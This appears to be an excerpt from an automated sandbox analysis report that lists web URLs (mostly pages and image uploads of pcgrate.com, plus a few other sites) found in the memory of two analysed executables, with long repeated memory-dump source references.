                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687770203.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ora-ito.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ottospm.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ozs.si/o-zbornici
                  Source: PIyT9A3jfC.exe, 00000001.00000003.807475792.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pb-games.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com
                  Source: pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/
                  Source: pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#author
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#logo
                  Source: pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#organization
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#richSnippet
                  Source: pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#webpage
                  Source: pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#website
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/?s=
                  Source: pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/cart/
                  Source: pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/checkout/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/comments/feed/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/feed/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-admin/admin-ajax.php
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1024px-Logo_Ball_Corporation.svg_-e1637155176306.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1200px-Zeiss_logosvg-e1626287816597.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1280px-Jet_Propulsio.png
